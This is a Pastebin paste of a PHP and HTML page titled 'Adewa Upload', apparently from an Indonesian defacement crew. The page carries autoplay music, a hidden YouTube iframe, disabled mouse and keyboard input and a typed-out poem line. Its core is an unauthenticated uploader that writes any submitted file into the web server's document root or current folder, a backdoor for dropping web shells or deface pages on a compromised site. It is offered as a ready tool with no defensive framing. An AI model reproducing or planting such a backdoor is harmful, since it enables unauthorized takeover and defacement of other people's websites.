Advertisement
usagiexploit

Untitled

Apr 24th, 2018
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.24 KB | None | 0 0
  1. <html lang='en-US'><head><title>Adewa Upload</title>
  2. <iframe width="1" height="1" src="http://www.youtube.com/embed/SRiLZKCChbI?rel=0&autoplay=1&loop=1&playlist=DdpzFW5mCT0" frameborder="0" allowfullscreen></iframe></td><body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
  3. <style>
  4. body{cursor:url("http:///foro.elhacker.net/elhacker.cur"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
  5. body {
  6. background-color: #000000;
  7. background-image: url(https://i.imgur.com/vCj6eyA.jpg); center
  8. <!--http://www.twitrcover.com/ar/uploads/Al-Quds-Twitter-Header-8534.jpg-->
  9. margin-left: 0px;
  10. margin-top: 0px;
  11. margin-right: 0px;
  12. margin-bottom: 0px;
  13. background-position:right top;
  14. background-repeat:no-repeat;
  15. background-size:110%
  16. }
  17. .style1 {
  18. font-family: Arial, Helvetica, sans-serif;
  19. font-size: 12px;
  20. }
  21. </style>
  22. <br><b><font color='White' face='Tahoma' font size="5px"'>Adewa Di sini !!</font></b>
  23.  
  24. <br>
  25. <center><?php
  26. echo "<form method='post' enctype='multipart/form-data'>
  27. <input type='file' name='idx_file'>
  28. <input type='submit' name='upload' value='upload'>
  29. </form>";
  30. $root = $_SERVER['DOCUMENT_ROOT'];
  31. $files = $_FILES['idx_file']['name'];
  32. $dest = $root.'/'.$files;
  33. if(isset($_POST['upload'])) {
  34. if(is_writable($root)) {
  35. if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
  36. $web = "http://".$_SERVER['HTTP_HOST']."/";
  37. echo "Ciee Sukses Uploadnya :* -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  38. } else {
  39. echo "gagal upload root >:(";
  40. }
  41. } else {
  42. if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
  43. echo "Ciee Sukses Uploadnya :* <b>$files</b> di folder ini";
  44. } else {
  45. echo "gagal upload >:(";
  46. }
  47. }
  48. }
  49. ?>
  50.  
  51. <!DOCTYPE html>
  52. <html>
  53. <title>K.K.B.T.A</title>
  54.  
  55. <audio autoplay loop>
  56. <source src="http://micro.byethost24.com/KITA.mp3"></source>
  57. </audio>
  58. <head>
  59. <link href='https://fonts.googleapis.com/css?family=Architects+Daughter' rel='stylesheet' type='text/css'>
  60. </head>
  61. <body bgcolor="#2b2b2b" link="gray" text="gray">
  62. <center>
  63.  
  64. <script type="text/javascript">
  65. TypingText = function(element, interval, cursor, finishedCallback) {
  66. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  67. this.running = true;
  68. return;
  69. }
  70. this.element = element;
  71. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  72. this.interval = (typeof interval == "undefined" ? 100 : interval);
  73. this.origText = this.element.innerHTML;
  74. this.unparsedOrigText = this.origText;
  75. this.cursor = (cursor ? cursor : "");
  76. this.currentText = "";
  77. this.currentChar = 0;
  78. this.element.typingText = this;
  79. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  80. TypingText.all.push(this);
  81. this.running = false;
  82. this.inTag = false;
  83. this.tagBuffer = "";
  84. this.inHTMLEntity = false;
  85. this.HTMLEntityBuffer = "";
  86. }
  87. TypingText.all = new Array();
  88. TypingText.currentIndex = 0;
  89. TypingText.runAll = function() {
  90. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  91. }
  92. TypingText.prototype.run = function() {
  93. if(this.running) return;
  94. if(typeof this.origText == "undefined") {
  95. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  96. return;
  97. }
  98. if(this.currentText == "") this.element.innerHTML = "";
  99. if(this.currentChar < this.origText.length) {
  100. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  101. this.tagBuffer = "<";
  102. this.inTag = true;
  103. this.currentChar++;
  104. this.run();
  105. return;
  106. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  107. this.tagBuffer += ">";
  108. this.inTag = false;
  109. this.currentText += this.tagBuffer;
  110. this.currentChar++;
  111. this.run();
  112. return;
  113. } else if(this.inTag) {
  114. this.tagBuffer += this.origText.charAt(this.currentChar);
  115. this.currentChar++;
  116. this.run();
  117. return;
  118. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  119. this.HTMLEntityBuffer = "&";
  120. this.inHTMLEntity = true;
  121. this.currentChar++;
  122. this.run();
  123. return;
  124. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  125. this.HTMLEntityBuffer += ";";
  126. this.inHTMLEntity = false;
  127. this.currentText += this.HTMLEntityBuffer;
  128. this.currentChar++;
  129. this.run();
  130. return;
  131. } else if(this.inHTMLEntity) {
  132. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  133. this.currentChar++;
  134. this.run();
  135. return;
  136. } else {
  137. this.currentText += this.origText.charAt(this.currentChar);
  138. }
  139. this.element.innerHTML = this.currentText;
  140. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  141. this.currentChar++;
  142. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  143. } else {
  144. this.currentText = "";
  145. this.currentChar = 0;
  146. this.running = false;
  147. this.finishedCallback();
  148. }
  149. }
  150. </script>
  151.  
  152. <font face= "Architects Daughter">
  153. <p id="a"><font>K.I.T.A
  154. </p></font>
  155. <script type="text/javascript">
  156. new TypingText(document.getElementById("a"), 100, function(i){ var ar = new Array(""); return " " + ar[i.length % ar.length]; });
  157. //Type out examples:
  158. </script>
  159.  
  160. <font face= "Architects Daughter">
  161. <font id="aa"><font>Terkadang seseorang itu bisa membuat kita menjadi lemah
  162. </font>
  163. <script type="text/javascript">
  164. new TypingText(document.getElementById("aa"),72 , function(i){ var ar = new Array(""); return " " + ar[i.length % ar.length]; });
  165. //Type out examples:
  166. TypingText.runAll();
  167. </script>
  168.  
  169. </body>
  170. </html>
  171.  
  172. <!--
  173. ########################################################
  174. // Coded: HarisID
  175. // Puisi Karya: Wira Nagara
  176. // Hargai karya orang maka karya anda akan dihargai
  177. // Greetz: All My Friends.
  178. ########################################################
  179.  
  180. <!-- #Source HarisID --!>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement